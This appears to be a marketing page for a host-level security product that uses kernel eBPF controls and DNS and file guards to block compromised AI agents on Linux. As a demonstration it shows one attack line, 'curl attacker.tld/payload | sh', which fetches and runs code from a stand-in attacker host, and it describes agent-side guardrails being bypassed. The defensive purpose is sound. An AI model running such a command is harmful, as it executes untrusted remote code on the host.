Risk surfaced
The tool chain is classified before it reaches the host.
signal · network + shell chainPrompt guards live inside the conversation the attacker controls. Enterprise puts the decision below it: on a supported Linux kernel, the Execution Gate denies unauthorized binaries at exec, the DNS Guard denies unauthorized domains, and the evidence of both survives.
Switch between expected work and a compromised-agent path, and follow the same tool call through guard, gate, and evidence.
curl attacker.tld/payload | shThe tool chain is classified before it reaches the host.
signal · network + shell chainEnterprise enforces outside the compromised agent process.
EPERM · eBPF LSM gateAttempt, decision, and enforcing control form one record.
block hash · f2b7…1d09The agent-side context is compromised. The execution boundary is not: Linux denies the payload before it starts, then preserves the block as evidence.
Guardrails inside the agent reduce risk before an action. Enterprise assumes they can be bypassed, and keeps the last decision at the host.
On supported Linux kernels, an agent-scoped eBPF LSM gate denies unknown binaries before they start. Legitimate host workloads outside that process boundary continue normally.
bprm_check_security · scoped cgroup · hard EPERMSecret Read Guard protects declared sensitive paths, while DNS Guard pre-authorizes destinations. Both complement agent policy with controls outside the model context.
file_open LSM · DNS allow policy · local decisions82 host detectors and 69 cross-layer correlation rules connect agent intent to process, file, identity, and network behavior.
eBPF telemetry · verified outcomes · autonomous responseLocal decision history, host and tenant attribution, correction records, and signed off-host anchors create evidence for incident response and security review.
append-only records · hash chain · signed anchorConfiguration is not protection. The live control must be compatible, scoped, armed, and verified before the dashboard is allowed to claim enforcement, so production is never the policy test.
Establish the agent, host, and workload boundary without changing execution.
Measure exactly what would be denied and resolve legitimate paths before cutover.
Arm only on a compatible Linux host after a clean rehearsal and explicit operator approval.
Compare configured state with the live kernel and retain the resulting evidence.
The paid stack installs on a Linux server and comes up in observe mode: it watches the machine and explains what it sees, and blocks nothing until you decide it should.
curl -fsSL https://innerwarden.com/install | sudo bash -s -- --license=/path/to/license.keyInstalls the eBPF sensor, the host detectors, cross-layer correlation, autonomous response, and the paid capabilities (Execution Gate, DNS Guard, anti-tamper watchdog). Linux only: eBPF needs a recent kernel and root. Prefer to read it first? Download the script, review it, then run it. Flags: ... | sudo bash -s -- --help
Pricing is scoped per deployment. Talk to us about a license, or start a scoped pilot.
Run the command above on the host, passing the license key we sent you. The license is what selects the paid tier, so it goes in the install command rather than after it. It stays in observe: nothing is blocked yet.
Follow the rollout above. The dashboard only claims enforcement once the live control is compatible, scoped, armed, and verified.
Full steps, verification, and the unattended flags are in the install documentation. Already running the free guardrail? It keeps working: the paid tier adds the host layer underneath it.
Community is deliberately useful on its own. Enterprise is not a feature unlock dressed as security: it adds the host-enforced boundary that is verified before it claims enforcement.
Cross-platform command and MCP screening, agent discovery, AI Jail sandboxing on platforms that support it, local decisions, dashboard, token intelligence, and alerts.
The Linux host sensor, eBPF visibility, agent-scoped kernel controls and autonomous response. See the pricing page for the full breakdown.
Fleet and tenant operations, management controls, and signed evidence workflows across many hosts.
In-path MCP proxy controls and the armed host or kernel boundary. Advisory checks alone remain bypassable if a hostile agent refuses to call them.
A supported Linux kernel with BPF LSM active, a verified live gate, an explicit scope, and a completed observe-and-rehearse workflow.
We scope one agent, one threat model, one Linux deployment, and measurable pass/fail criteria. You finish with a tested control boundary and evidence your security team can review.
Not ready for a production pilot? Install free and start building the agent decision history today.